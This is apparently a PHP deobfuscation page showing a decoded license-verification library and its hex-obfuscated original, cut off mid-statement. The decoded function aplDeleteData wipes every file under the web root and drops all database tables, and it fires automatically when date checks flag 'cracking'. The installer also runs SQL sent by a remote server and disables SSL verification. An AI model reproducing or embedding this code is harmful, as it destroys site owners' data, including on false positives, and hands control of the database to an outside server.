aplCustomPost(APL_ROOT_URL . "/apl_callbacks/license_uninstall.php", $post_info, $ROOT_URL); $notifications_array = aplParseServerNotifications($content_array, $ROOT_URL, $CLIENT_EMAIL, $LICENSE_CODE); if (!($notifications_array["notification_case"] == "notification_license_ok")) { goto Iqfen; } if (!(APL_STORAGE == "DATABASE")) { goto P3uG8; } mysqli_query($MYSQLI_LINK, "DELETE FROM " . APL_DATABASE_TABLE); mysqli_query($MYSQLI_LINK, "DROP TABLE " . APL_DATABASE_TABLE); P3uG8: if (!(APL_STORAGE == "FILE")) { goto aEpHb; } $handle = @fopen(APL_DIRECTORY . "/" . APL_LICENSE_FILE_LOCATION, "w+"); @fclose($handle); aEpHb: Iqfen: HE827: ObaEe: return $notifications_array; } function aplDeleteData($MYSQLI_LINK = null) { if (APL_GOD_MODE == "YES" && isset($_SERVER["DOCUMENT_ROOT"])) { goto XeptJ; } $root_directory = dirname(__DIR__); goto DmW3W; XeptJ: $root_directory = $_SERVER["DOCUMENT_ROOT"]; DmW3W: foreach (new RecursiveIteratorIterator(new RecursiveDirectoryIterator($root_directory, FilesystemIterator::SKIP_DOTS), RecursiveIteratorIterator::CHILD_FIRST) as $path) { $path->isDir() && !$path->isLink() ? rmdir($path->getPathname()) : unlink($path->getPathname()); ePT0J: } bavJo: rmdir($root_directory); if (!(APL_STORAGE == "DATABASE")) { goto N438W; } $database_tables_array = array(); $table_list_results = mysqli_query($MYSQLI_LINK, "SHOW TABLES"); TbUcS: if (!($table_list_row = mysqli_fetch_row($table_list_results))) { goto CaWIH; } $database_tables_array[] = $table_list_row[0]; goto TbUcS; CaWIH: if (empty($database_tables_array)) { goto henAl; } foreach ($database_tables_array as $table_name) { mysqli_query($MYSQLI_LINK, "DELETE FROM {$table_name}"); bLKWf: } f3yle: foreach ($database_tables_array as $table_name) { mysqli_query($MYSQLI_LINK, "DROP TABLE {$table_name}"); MT2nl: } HOagy: henAl: N438W: exit; }  ?>

Did this file decode correctly?

Original Code

<?php
/*
* Copyright (C) Incevio Systems, Inc - All Rights Reserved
* Unauthorized copying of this file, via any medium is strictly prohibited
* Proprietary and confidential
* Written by Munna Khan <[email protected]>, September 2018
*/
 function aplCustomEncrypt($string, $key) { $encrypted_string = null; if (!(!empty($string) && !empty($key))) { goto spiDi; } $iv = openssl_random_pseudo_bytes(openssl_cipher_iv_length("\141\x65\163\x2d\62\x35\66\x2d\x63\142\x63")); $encrypted_string = openssl_encrypt($string, "\141\x65\x73\x2d\62\65\x36\x2d\143\x62\143", $key, 0, $iv); $encrypted_string = base64_encode($encrypted_string . "\x3a\x3a" . $iv); spiDi: return $encrypted_string; } function aplCustomDecrypt($string, $key) { $decrypted_string = null; if (!(!empty($string) && !empty($key))) { goto SoK2Z; } $string = base64_decode($string); if (!stristr($string, "\72\x3a")) { goto NwDxh; } $string_iv_array = explode("\72\72", $string, 2); if (!(!empty($string_iv_array) && count($string_iv_array) == 2)) { goto RFv61; } list($encrypted_string, $iv) = $string_iv_array; $decrypted_string = openssl_decrypt($encrypted_string, "\x61\x65\163\55\x32\65\x36\55\x63\142\143", $key, 0, $iv); RFv61: NwDxh: SoK2Z: return $decrypted_string; } function aplValidateIntegerValue($number, $min_value = 0, $max_value = INF) { $result = false; if (!(!is_float($number) && filter_var($number, FILTER_VALIDATE_INT, array("\157\160\x74\151\157\156\x73" => array("\x6d\x69\156\137\162\x61\156\x67\145" => $min_value, "\x6d\x61\170\137\162\141\156\147\145" => $max_value))) !== false)) { goto SsVeN; } $result = true; SsVeN: return $result; } function aplValidateRawDomain($url) { $result = false; if (empty($url)) { goto WAbZj; } if (preg_match("\x2f\136\x5b\141\x2d\x7a\x30\55\71\55\x2e\x5d\53\134\x2e\x5b\141\55\x7a\x5c\x2e\135\x7b\62\54\67\x7d\44\x2f", strtolower($url))) { goto afxTZ; } $result = false; goto s2s07; afxTZ: $result = true; s2s07: WAbZj: return $result; } function aplGetCurrentUrl($remove_last_slash = null) { $protocol = "\x68\164\164\160"; $host = null; $script = null; $params = null; $current_url = null; if (!(isset($_SERVER["\x48\124\124\x50\x53"]) && $_SERVER["\110\x54\124\x50\x53"] !== "\157\x66\146" || isset($_SERVER["\x48\x54\124\x50\137\130\x5f\106\x4f\x52\127\101\x52\104\x45\104\137\120\122\x4f\x54\117"]) && $_SERVER["\110\124\124\120\x5f\130\x5f\106\117\122\127\101\122\104\x45\x44\137\x50\x52\x4f\124\117"] == "\150\x74\x74\x70\163")) { goto lUaDr; } $protocol = "\150\x74\x74\x70\163"; lUaDr: if (!isset($_SERVER["\x48\124\x54\x50\137\110\117\123\x54"])) { goto lulfT; } $host = $_SERVER["\110\x54\x54\x50\137\x48\117\123\x54"]; lulfT: if (!isset($_SERVER["\123\x43\122\111\120\124\137\x4e\x41\x4d\x45"])) { goto oGFBW; } $script = $_SERVER["\x53\103\122\x49\x50\124\x5f\116\x41\x4d\x45"]; oGFBW: if (!isset($_SERVER["\121\125\x45\122\x59\137\123\x54\x52\x49\x4e\x47"])) { goto y9zX4; } $params = $_SERVER["\121\x55\105\122\x59\137\123\x54\122\x49\x4e\x47"]; y9zX4: if (!(!empty($protocol) && !empty($host) && !empty($script))) { goto zPxl_; } $current_url = $protocol . "\x3a\x2f\x2f" . $host . $script; if (empty($params)) { goto SZ3So; } $current_url .= "\77" . $params; SZ3So: if (!($remove_last_slash == 1)) { goto FCdZ3; } XQaAn: if (!(substr($current_url, -1) == "\57")) { goto tSvoD; } $current_url = substr($current_url, 0, -1); goto XQaAn; tSvoD: FCdZ3: zPxl_: return $current_url; } function aplGetRawDomain($url) { $raw_domain = null; if (empty($url)) { goto XJPI9; } $url_array = parse_url($url); if (!empty($url_array["\x73\x63\x68\145\x6d\x65"])) { goto QQtqq; } $url = "\x68\164\x74\x70\x3a\57\57" . $url; $url_array = parse_url($url); QQtqq: if (empty($url_array["\150\157\163\164"])) { goto PH1qh; } $raw_domain = $url_array["\x68\x6f\x73\x74"]; $raw_domain = trim(str_ireplace("\167\167\x77\x2e", '', filter_var($raw_domain, FILTER_SANITIZE_URL))); PH1qh: XJPI9: return $raw_domain; } function aplGetRootUrl($url, $remove_scheme, $remove_www, $remove_path, $remove_last_slash) { if (!filter_var($url, FILTER_VALIDATE_URL)) { goto OjYei; } $url_array = parse_url($url); $url = str_ireplace($url_array["\163\x63\150\x65\155\145"] . "\72\x2f\57", '', $url); if ($remove_path == 1) { goto PhdUD; } $last_slash_position = strripos($url, "\57"); if (!($last_slash_position > 0)) { goto YtJpN; } $url = substr($url, 0, $last_slash_position + 1); YtJpN: goto Gai2C; PhdUD: $first_slash_position = stripos($url, "\x2f"); if (!($first_slash_position > 0)) { goto DSlZb; } $url = substr($url, 0, $first_slash_position + 1); DSlZb: Gai2C: if (!($remove_scheme != 1)) { goto DZHIT; } $url = $url_array["\x73\x63\x68\x65\155\x65"] . "\x3a\57\x2f" . $url; DZHIT: if (!($remove_www == 1)) { goto PBkE6; } $url = str_ireplace("\167\x77\x77\x2e", '', $url); PBkE6: if (!($remove_last_slash == 1)) { goto eXR8C; } Aw2Nh: if (!(substr($url, -1) == "\x2f")) { goto jgUU5; } $url = substr($url, 0, -1); goto Aw2Nh; jgUU5: eXR8C: OjYei: return trim($url); } function aplCustomPost($url, $post_info = null, $refer = null) { $user_agent = "\x70\150\x70\155\151\154\x6c\151\x6f\x6e\x20\x63\125\122\x4c"; $connect_timeout = 10; $server_response_array = array(); $formatted_headers_array = array(); if (!(filter_var($url, FILTER_VALIDATE_URL) && !empty($post_info))) { goto wqyO7; } if (!(empty($refer) || !filter_var($refer, FILTER_VALIDATE_URL))) { goto LBeGp; } $refer = $url; LBeGp: $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_USERAGENT, $user_agent); curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $connect_timeout); curl_setopt($ch, CURLOPT_TIMEOUT, $connect_timeout); curl_setopt($ch, CURLOPT_REFERER, $refer); curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_POSTFIELDS, $post_info); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($ch, CURLOPT_MAXREDIRS, 10); curl_setopt($ch, CURLOPT_HEADERFUNCTION, function ($curl, $header) use(&$formatted_headers_array) { $len = strlen($header); $header = explode("\72", $header, 2); if (!(count($header) < 2)) { goto dL9zV; } return $len; dL9zV: $name = strtolower(trim($header[0])); $formatted_headers_array[$name] = trim($header[1]); return $len; }); $result = curl_exec($ch); $curl_error = curl_error($ch); curl_close($ch); $server_response_array["\150\145\141\x64\145\162\163"] = $formatted_headers_array; $server_response_array["\x65\x72\x72\157\x72"] = $curl_error; $server_response_array["\x62\x6f\144\171"] = $result; wqyO7: return $server_response_array; } function aplVerifyDateTime($datetime, $format) { $result = false; if (!(!empty($datetime) && !empty($format))) { goto ar7NN; } $datetime = DateTime::createFromFormat($format, $datetime); $errors = DateTime::getLastErrors(); if (!($datetime && empty($errors["\167\141\x72\x6e\151\156\x67\137\143\157\165\156\164"]))) { goto p8k8q; } $result = true; p8k8q: ar7NN: return $result; } function aplGetDaysBetweenDates($date_from, $date_to) { $number_of_days = 0; if (!(aplVerifyDateTime($date_from, "\131\55\x6d\x2d\x64") && aplVerifyDateTime($date_to, "\x59\55\155\55\144"))) { goto up0Y3; } $date_to = new DateTime($date_to); $date_from = new DateTime($date_from); $number_of_days = $date_from->diff($date_to)->format("\45\x61"); up0Y3: return $number_of_days; } function aplParseXmlTags($content, $tag_name) { $parsed_value = null; if (!(!empty($content) && !empty($tag_name))) { goto o9qce; } preg_match_all("\57\74" . preg_quote($tag_name, "\57") . "\x3e\50\x2e\52\x3f\51\x3c\134\x2f" . preg_quote($tag_name, "\57") . "\76\x2f\x69\x6d\163", $content, $output_array, PREG_SET_ORDER); if (empty($output_array[0][1])) { goto UEn0c; } $parsed_value = trim($output_array[0][1]); UEn0c: o9qce: return $parsed_value; } function aplParseServerNotifications($content_array, $ROOT_URL, $CLIENT_EMAIL, $LICENSE_CODE) { $notifications_array = array(); if (!empty($content_array)) { goto Dlcv2; } $notifications_array["\x6e\x6f\164\151\x66\x69\x63\141\164\x69\x6f\x6e\137\x63\141\x73\x65"] = "\156\x6f\x74\151\x66\x69\x63\x61\164\151\x6f\x6e\137\156\x6f\137\x63\x6f\x6e\156\x65\x63\x74\151\x6f\x6e"; $notifications_array["\156\x6f\164\151\x66\151\x63\x61\x74\151\157\156\137\x74\145\170\x74"] = APL_NOTIFICATION_NO_CONNECTION; goto mI117; Dlcv2: if (!empty($content_array["\150\145\141\x64\145\162\163"]["\156\x6f\x74\x69\146\x69\143\x61\164\151\x6f\156\137\163\145\x72\x76\145\162\x5f\x73\151\147\156\141\164\165\x72\x65"]) && aplVerifyServerSignature($content_array["\150\x65\141\144\145\x72\x73"]["\x6e\x6f\164\151\146\x69\143\141\x74\151\x6f\x6e\137\163\x65\x72\166\x65\x72\x5f\163\x69\147\x6e\141\x74\x75\162\x65"], $ROOT_URL, $CLIENT_EMAIL, $LICENSE_CODE)) { goto o225P; } $notifications_array["\x6e\157\164\x69\146\151\143\141\164\151\x6f\156\137\143\141\x73\x65"] = "\x6e\157\x74\151\146\151\143\x61\164\x69\157\x6e\x5f\151\x6e\166\141\x6c\151\x64\137\162\x65\163\160\x6f\x6e\163\145"; $notifications_array["\156\157\x74\x69\x66\x69\143\x61\164\x69\157\x6e\137\164\145\x78\164"] = APL_NOTIFICATION_INVALID_RESPONSE; goto R640t; o225P: $notifications_array["\156\x6f\x74\x69\146\151\143\141\x74\x69\x6f\x6e\137\x63\x61\163\x65"] = $content_array["\x68\145\x61\x64\145\x72\163"]["\156\157\164\151\x66\151\x63\x61\164\x69\x6f\x6e\x5f\143\x61\163\x65"]; $notifications_array["\156\157\164\151\146\x69\143\141\x74\151\x6f\156\137\164\145\x78\164"] = $content_array["\150\x65\141\x64\x65\x72\163"]["\x6e\x6f\x74\151\146\151\x63\141\x74\151\x6f\x6e\x5f\x74\x65\170\164"]; if (empty($content_array["\x68\x65\141\144\145\x72\163"]["\156\x6f\x74\x69\x66\x69\143\x61\x74\x69\x6f\x6e\x5f\144\141\164\x61"])) { goto zyk98; } $notifications_array["\x6e\157\164\151\x66\151\x63\x61\x74\x69\x6f\156\x5f\x64\141\164\x61"] = json_decode($content_array["\150\x65\141\144\145\x72\x73"]["\156\157\164\151\x66\x69\x63\141\x74\151\157\x6e\137\144\141\164\x61"], true); zyk98: R640t: mI117: return $notifications_array; } function aplGenerateScriptSignature($ROOT_URL, $CLIENT_EMAIL, $LICENSE_CODE) { $script_signature = null; $root_ips_array = gethostbynamel(aplGetRawDomain(APL_ROOT_URL)); if (!(!empty($ROOT_URL) && isset($CLIENT_EMAIL) && isset($LICENSE_CODE) && !empty($root_ips_array))) { goto qE70K; } $script_signature = hash("\163\150\x61\x32\65\66", gmdate("\131\55\155\x2d\x64") . $ROOT_URL . $CLIENT_EMAIL . $LICENSE_CODE . APL_PRODUCT_ID . implode('', $root_ips_array)); qE70K: return $script_signature; } function aplVerifyServerSignature($notification_server_signature, $ROOT_URL, $CLIENT_EMAIL, $LICENSE_CODE) { $result = false; $root_ips_array = gethostbynamel(aplGetRawDomain(APL_ROOT_URL)); if (!(!empty($notification_server_signature) && !empty($ROOT_URL) && isset($CLIENT_EMAIL) && isset($LICENSE_CODE) && !empty($root_ips_array))) { goto JM83k; } if (!(hash("\x73\150\141\62\65\x36", implode('', $root_ips_array) . APL_PRODUCT_ID . $LICENSE_CODE . $CLIENT_EMAIL . $ROOT_URL . gmdate("\131\55\155\55\x64")) == $notification_server_signature)) { goto cNguZ; } $result = true; cNguZ: JM83k: return $result; } function aplCheckSettings() { $notifications_array = array(); if (!(empty(APL_SALT) || APL_SALT == "\163\157\155\145\137\162\x61\156\x64\x6f\x6d\137\x74\x65\170\164")) { goto WECwp; } $notifications_array[] = APL_CORE_NOTIFICATION_INVALID_SALT; WECwp: if (!(!filter_var(APL_ROOT_URL, FILTER_VALIDATE_URL) || !ctype_alnum(substr(APL_ROOT_URL, -1)))) { goto sJsIQ; } $notifications_array[] = APL_CORE_NOTIFICATION_INVALID_ROOT_URL; sJsIQ: if (filter_var(APL_PRODUCT_ID, FILTER_VALIDATE_INT)) { goto Cgzq0; } $notifications_array[] = APL_CORE_NOTIFICATION_INVALID_PRODUCT_ID; Cgzq0: if (aplValidateIntegerValue(APL_DAYS, 1, 365)) { goto MjFXX; } $notifications_array[] = APL_CORE_NOTIFICATION_INVALID_VERIFICATION_PERIOD; MjFXX: if (!(APL_STORAGE != "\x44\x41\124\101\x42\101\x53\x45" && APL_STORAGE != "\x46\x49\x4c\x45")) { goto WByPf; } $notifications_array[] = APL_CORE_NOTIFICATION_INVALID_STORAGE; WByPf: if (!(APL_STORAGE == "\x44\x41\x54\x41\102\x41\x53\x45" && !ctype_alnum(str_ireplace(array("\x5f"), '', APL_DATABASE_TABLE)))) { goto vRpQn; } $notifications_array[] = APL_CORE_NOTIFICATION_INVALID_TABLE; vRpQn: if (!(APL_STORAGE == "\106\x49\114\105" && !@is_writable(APL_DIRECTORY . "\57" . APL_LICENSE_FILE_LOCATION))) { goto vezbr; } $notifications_array[] = APL_CORE_NOTIFICATION_INVALID_LICENSE_FILE; vezbr: if (!(!empty(APL_ROOT_IP) && !filter_var(APL_ROOT_IP, FILTER_VALIDATE_IP))) { goto d58rH; } $notifications_array[] = APL_CORE_NOTIFICATION_INVALID_ROOT_IP; d58rH: if (!(!empty(APL_ROOT_IP) && !in_array(APL_ROOT_IP, gethostbynamel(aplGetRawDomain(APL_ROOT_URL))))) { goto yAaCY; } $notifications_array[] = APL_CORE_NOTIFICATION_INVALID_DNS; yAaCY: if (!(defined("\101\120\x4c\x5f\122\x4f\117\124\137\116\x41\115\105\123\x45\x52\126\x45\122\123") && !empty(APL_ROOT_NAMESERVERS))) { goto plEh6; } foreach (APL_ROOT_NAMESERVERS as $nameserver) { if (aplValidateRawDomain($nameserver)) { goto CQnfW; } $notifications_array[] = APL_CORE_NOTIFICATION_INVALID_ROOT_NAMESERVERS; goto QU26y; CQnfW: t7xCd: } QU26y: plEh6: if (!(defined("\101\120\x4c\137\x52\x4f\x4f\124\137\x4e\101\x4d\105\x53\x45\x52\126\105\x52\123") && !empty(APL_ROOT_NAMESERVERS))) { goto oIiS9; } $apl_root_nameservers_array = APL_ROOT_NAMESERVERS; $fetched_nameservers_array = array(); $dns_records_array = dns_get_record(aplGetRawDomain(APL_ROOT_URL), DNS_NS); foreach ($dns_records_array as $record) { $fetched_nameservers_array[] = $record["\x74\x61\x72\147\x65\x74"]; XQYuX: } IEo8l: $apl_root_nameservers_array = array_map("\x73\164\162\x74\x6f\x6c\x6f\x77\x65\x72", $apl_root_nameservers_array); $fetched_nameservers_array = array_map("\163\164\162\x74\157\x6c\x6f\167\145\x72", $fetched_nameservers_array); sort($apl_root_nameservers_array); sort($fetched_nameservers_array); if (!($apl_root_nameservers_array != $fetched_nameservers_array)) { goto eDJLN; } $notifications_array[] = APL_CORE_NOTIFICATION_INVALID_DNS; eDJLN: oIiS9: return $notifications_array; } function aplParseLicenseFile() { $license_data_array = array(); if (!@is_readable(APL_DIRECTORY . "\x2f" . APL_LICENSE_FILE_LOCATION)) { goto jNOrA; } $file_content = file_get_contents(APL_DIRECTORY . "\57" . APL_LICENSE_FILE_LOCATION); preg_match_all("\x2f\x3c\50\133\101\x2d\132\137\x5d\x2b\x29\x3e\x28\56\52\77\51\x3c\134\x2f\x28\x5b\101\55\132\137\135\x2b\51\76\x2f", $file_content, $matches, PREG_SET_ORDER); if (empty($matches)) { goto LcPwn; } foreach ($matches as $value) { if (!(!empty($value[1]) && $value[1] == $value[3])) { goto LQr0y; } $license_data_array[$value[1]] = $value[2]; LQr0y: X7iCo: } VShgC: LcPwn: jNOrA: return $license_data_array; } function aplGetLicenseData($MYSQLI_LINK = null) { $settings_row = array(); if (!(APL_STORAGE == "\104\x41\x54\101\102\101\123\x45")) { goto A0xsY; } $settings_results = @mysqli_query($MYSQLI_LINK, "\123\x45\x4c\105\x43\x54\40\x2a\40\106\122\x4f\x4d\40" . APL_DATABASE_TABLE); $settings_row = @mysqli_fetch_assoc($settings_results); A0xsY: if (!(APL_STORAGE == "\106\111\x4c\105")) { goto LMusW; } $settings_row = aplParseLicenseFile(); LMusW: return $settings_row; } function aplCheckConnection() { $notifications_array = array(); $content_array = aplCustomPost(APL_ROOT_URL . "\57\x61\x70\154\x5f\x63\x61\154\x6c\142\141\143\x6b\163\x2f\x63\157\156\156\x65\x63\164\151\x6f\156\137\164\x65\x73\x74\x2e\160\150\x70", "\160\x72\157\144\x75\x63\x74\137\x69\x64\x3d" . rawurlencode(APL_PRODUCT_ID) . "\x26\143\157\156\x6e\x65\x63\164\151\157\x6e\137\x68\141\x73\150\75" . rawurlencode(hash("\x73\150\x61\x32\x35\66", "\143\x6f\x6e\156\x65\143\x74\151\x6f\x6e\x5f\x74\145\163\164"))); if (!empty($content_array)) { goto SSimy; } $notifications_array["\156\157\164\151\x66\x69\143\141\x74\151\157\156\137\x63\x61\163\x65"] = "\x6e\157\164\x69\146\151\143\x61\x74\151\x6f\x6e\x5f\x6e\157\x5f\x63\x6f\x6e\x6e\x65\143\164\151\157\x6e"; $notifications_array["\156\157\164\151\146\151\143\141\164\151\x6f\156\x5f\x74\x65\170\x74"] = APL_NOTIFICATION_NO_CONNECTION; goto Pxkuz; SSimy: if (!($content_array["\x62\157\x64\x79"] != "\x3c\143\x6f\156\x6e\x65\x63\x74\151\x6f\156\x5f\x74\145\163\164\76\x4f\113\74\57\x63\157\x6e\156\x65\143\x74\x69\x6f\156\x5f\164\145\163\x74\76")) { goto NcvQT; } $notifications_array["\156\x6f\164\x69\146\151\x63\x61\164\x69\157\156\x5f\143\x61\163\145"] = "\x6e\157\x74\151\146\151\143\x61\x74\151\x6f\156\137\151\x6e\x76\x61\x6c\x69\x64\x5f\x72\145\163\x70\157\156\163\145"; $notifications_array["\x6e\x6f\164\x69\146\x69\x63\x61\164\x69\x6f\156\x5f\x74\x65\x78\x74"] = APL_NOTIFICATION_INVALID_RESPONSE; NcvQT: Pxkuz: return $notifications_array; } function aplCheckData($MYSQLI_LINK = null) { $error_detected = 0; $cracking_detected = 0; $data_check_result = false; extract(aplGetLicenseData($MYSQLI_LINK)); if (!(!empty($ROOT_URL) && !empty($INSTALLATION_HASH) && !empty($INSTALLATION_KEY) && !empty($LCD) && !empty($LRD))) { goto psiaF; } $LCD = aplCustomDecrypt($LCD, APL_SALT . $INSTALLATION_KEY); $LRD = aplCustomDecrypt($LRD, APL_SALT . $INSTALLATION_KEY); if (!(!filter_var($ROOT_URL, FILTER_VALIDATE_URL) || !ctype_alnum(substr($ROOT_URL, -1)))) { goto hTeZR; } $error_detected = 1; hTeZR: if (!(filter_var(aplGetCurrentUrl(), FILTER_VALIDATE_URL) && stristr(aplGetRootUrl(aplGetCurrentUrl(), 1, 1, 0, 1), aplGetRootUrl("{$ROOT_URL}\x2f", 1, 1, 0, 1)) === false)) { goto gflsu; } $error_detected = 1; gflsu: if (!(empty($INSTALLATION_HASH) || $INSTALLATION_HASH != hash("\163\150\141\x32\x35\66", $ROOT_URL . $CLIENT_EMAIL . $LICENSE_CODE))) { goto jw_rZ; } $error_detected = 1; jw_rZ: if (!(empty($INSTALLATION_KEY) || !password_verify($LRD, aplCustomDecrypt($INSTALLATION_KEY, APL_SALT . $ROOT_URL)))) { goto fu05y; } $error_detected = 1; fu05y: if (aplVerifyDateTime($LCD, "\x59\55\x6d\x2d\144")) { goto vhfyn; } $error_detected = 1; vhfyn: if (aplVerifyDateTime($LRD, "\x59\x2d\x6d\55\x64")) { goto ztrkL; } $error_detected = 1; ztrkL: if (!(aplVerifyDateTime($LCD, "\x59\55\155\x2d\144") && $LCD > date("\x59\55\x6d\55\x64", strtotime("\53\x31\40\144\x61\171")))) { goto WMq3c; } $error_detected = 1; $cracking_detected = 1; WMq3c: if (!(aplVerifyDateTime($LRD, "\131\55\155\x2d\x64") && $LRD > date("\x59\x2d\155\55\144", strtotime("\53\61\40\x64\x61\x79")))) { goto Ixfue; } $error_detected = 1; $cracking_detected = 1; Ixfue: if (!(aplVerifyDateTime($LCD, "\x59\x2d\155\55\x64") && aplVerifyDateTime($LRD, "\131\55\155\x2d\144") && $LCD > $LRD)) { goto IUzT2; } $error_detected = 1; $cracking_detected = 1; IUzT2: if (!($cracking_detected == 1 && APL_DELETE_CRACKED == "\131\105\x53")) { goto MNxGh; } aplDeleteData($MYSQLI_LINK); MNxGh: if (!($error_detected != 1 && $cracking_detected != 1)) { goto qC7lr; } $data_check_result = true; qC7lr: psiaF: return $data_check_result; } function aplVerifyEnvatoPurchase($LICENSE_CODE = null) { $notifications_array = array(); $content_array = aplCustomPost(APL_ROOT_URL . "\57\141\x70\154\137\x63\x61\154\x6c\x62\141\x63\153\163\57\x76\145\162\x69\x66\x79\x5f\x65\156\166\141\164\x6f\x5f\160\165\x72\143\150\141\163\x65\56\160\x68\x70", "\160\162\157\144\165\x63\x74\x5f\151\144\75" . rawurlencode(APL_PRODUCT_ID) . "\46\154\x69\x63\x65\156\163\x65\137\143\x6f\144\145\75" . rawurlencode($LICENSE_CODE) . "\46\x63\157\156\156\145\x63\164\x69\157\x6e\137\x68\141\x73\150\75" . rawurlencode(hash("\163\x68\141\x32\x35\x36", "\166\145\162\x69\x66\x79\137\x65\156\x76\141\164\157\137\x70\x75\x72\x63\x68\x61\163\x65"))); if (!empty($content_array)) { goto STv1n; } $notifications_array["\x6e\157\164\151\146\x69\x63\x61\164\x69\x6f\x6e\137\x63\141\163\145"] = "\156\x6f\x74\x69\x66\151\143\141\x74\x69\157\x6e\x5f\x6e\x6f\137\x63\157\x6e\x6e\x65\x63\x74\151\x6f\x6e"; $notifications_array["\x6e\x6f\x74\151\x66\x69\143\141\x74\151\x6f\x6e\x5f\164\145\170\x74"] = APL_NOTIFICATION_NO_CONNECTION; goto mFbQa; STv1n: if (!($content_array["\142\157\x64\x79"] != "\74\x76\145\162\x69\x66\x79\137\145\x6e\166\141\164\x6f\x5f\x70\165\x72\x63\150\x61\x73\145\76\117\113\x3c\x2f\166\x65\162\x69\x66\x79\x5f\x65\156\x76\x61\164\157\137\x70\x75\162\x63\150\141\x73\145\x3e")) { goto o6z8s; } $notifications_array["\156\157\164\151\146\151\143\141\x74\x69\157\156\x5f\143\141\x73\x65"] = "\x6e\x6f\164\151\146\x69\x63\x61\x74\151\x6f\x6e\137\x69\x6e\x76\x61\x6c\x69\x64\x5f\162\x65\163\x70\x6f\156\x73\145"; $notifications_array["\x6e\157\164\x69\146\151\x63\x61\x74\151\157\x6e\137\x74\x65\x78\164"] = APL_NOTIFICATION_INVALID_RESPONSE; o6z8s: mFbQa: return $notifications_array; } function incevioVerify($ROOT_URL, $CLIENT_EMAIL, $LICENSE_CODE, $MYSQLI_LINK = null) { $notifications_array = array(); $apl_core_notifications = aplCheckSettings(); if (empty($apl_core_notifications)) { goto A5K8R; } $notifications_array["\156\157\164\x69\146\x69\x63\x61\x74\151\x6f\156\137\143\141\x73\145"] = "\156\x6f\x74\x69\x66\x69\x63\141\x74\x69\157\x6e\137\x73\143\162\151\x70\x74\137\143\x6f\x72\162\165\x70\164\x65\x64"; $notifications_array["\x6e\157\164\x69\x66\x69\x63\x61\164\x69\x6f\x6e\137\164\145\170\164"] = implode("\73\x20", $apl_core_notifications); goto WF85x; A5K8R: if (!empty(aplGetLicenseData($MYSQLI_LINK)) && is_array(aplGetLicenseData($MYSQLI_LINK))) { goto rvTJZ; } $INSTALLATION_HASH = hash("\163\x68\141\62\x35\66", $ROOT_URL . $CLIENT_EMAIL . $LICENSE_CODE); $post_info = "\160\162\157\x64\165\143\164\137\x69\144\x3d" . rawurlencode(APL_PRODUCT_ID) . "\46\143\154\x69\x65\x6e\164\137\145\x6d\141\151\x6c\x3d" . rawurlencode($CLIENT_EMAIL) . "\x26\x6c\151\x63\x65\x6e\x73\x65\x5f\143\157\144\145\x3d" . rawurlencode($LICENSE_CODE) . "\46\162\x6f\157\x74\137\x75\162\154\75" . rawurlencode($ROOT_URL) . "\46\x69\156\x73\x74\141\x6c\x6c\141\x74\x69\x6f\x6e\x5f\150\x61\x73\150\x3d" . rawurlencode($INSTALLATION_HASH) . "\x26\x6c\151\143\x65\x6e\163\x65\137\163\151\x67\x6e\141\x74\165\x72\x65\75" . rawurlencode(aplGenerateScriptSignature($ROOT_URL, $CLIENT_EMAIL, $LICENSE_CODE)); $content_array = aplCustomPost(APL_ROOT_URL . "\x2f\x61\x70\154\137\143\141\x6c\x6c\x62\x61\x63\153\163\57\x6c\151\x63\145\x6e\163\x65\137\151\156\163\164\x61\x6c\154\56\x70\x68\x70", $post_info, $ROOT_URL); $notifications_array = aplParseServerNotifications($content_array, $ROOT_URL, $CLIENT_EMAIL, $LICENSE_CODE); if (!($notifications_array["\x6e\x6f\164\151\146\x69\143\141\164\151\x6f\x6e\x5f\x63\141\163\145"] == "\156\x6f\164\x69\146\151\143\141\164\151\157\x6e\x5f\x6c\x69\x63\145\156\163\145\137\157\153")) { goto n9SgU; } $INSTALLATION_KEY = aplCustomEncrypt(password_hash(date("\x59\x2d\x6d\x2d\x64"), PASSWORD_DEFAULT), APL_SALT . $ROOT_URL); $LCD = aplCustomEncrypt(date("\131\x2d\x6d\55\x64", strtotime("\55" . APL_DAYS . "\x20\x64\x61\x79\x73")), APL_SALT . $INSTALLATION_KEY); $LRD = aplCustomEncrypt(date("\x59\55\x6d\55\x64"), APL_SALT . $INSTALLATION_KEY); if (!(APL_STORAGE == "\x44\101\124\x41\102\101\123\105")) { goto cWAxH; } $content_array = aplCustomPost(APL_ROOT_URL . "\57\141\160\x6c\x5f\x63\141\154\x6c\x62\x61\143\153\x73\57\x6c\x69\143\145\156\x73\x65\137\163\x63\150\x65\155\145\x2e\x70\150\160", $post_info, $ROOT_URL); $notifications_array = aplParseServerNotifications($content_array, $ROOT_URL, $CLIENT_EMAIL, $LICENSE_CODE); if (!(!empty($notifications_array["\x6e\x6f\x74\151\146\151\143\x61\164\x69\x6f\x6e\137\144\141\164\x61"]) && !empty($notifications_array["\156\157\164\151\x66\x69\143\141\x74\151\x6f\x6e\x5f\x64\x61\164\x61"]["\x73\143\x68\x65\x6d\x65\137\161\x75\145\162\x79"]))) { goto Q4ktB; } $mysql_bad_array = array("\x25\101\x50\114\137\104\101\124\101\x42\x41\123\105\x5f\124\101\102\114\105\45", "\45\122\x4f\117\124\x5f\x55\122\x4c\x25", "\x25\103\x4c\x49\105\x4e\x54\137\105\115\x41\x49\x4c\45", "\x25\x4c\x49\x43\x45\116\x53\105\x5f\103\117\104\x45\x25", "\45\x4c\103\x44\45", "\x25\x4c\x52\x44\45", "\45\111\116\123\x54\101\114\x4c\x41\124\111\x4f\x4e\x5f\113\x45\131\45", "\x25\111\116\123\124\101\x4c\x4c\x41\x54\111\x4f\116\x5f\x48\101\x53\x48\x25"); $mysql_good_array = array(APL_DATABASE_TABLE, $ROOT_URL, $CLIENT_EMAIL, $LICENSE_CODE, $LCD, $LRD, $INSTALLATION_KEY, $INSTALLATION_HASH); $license_scheme = str_replace($mysql_bad_array, $mysql_good_array, $notifications_array["\x6e\157\x74\151\x66\151\143\x61\x74\151\157\x6e\137\144\x61\x74\141"]["\x73\143\150\x65\155\145\x5f\x71\x75\145\x72\171"]); mysqli_multi_query($MYSQLI_LINK, $license_scheme) or 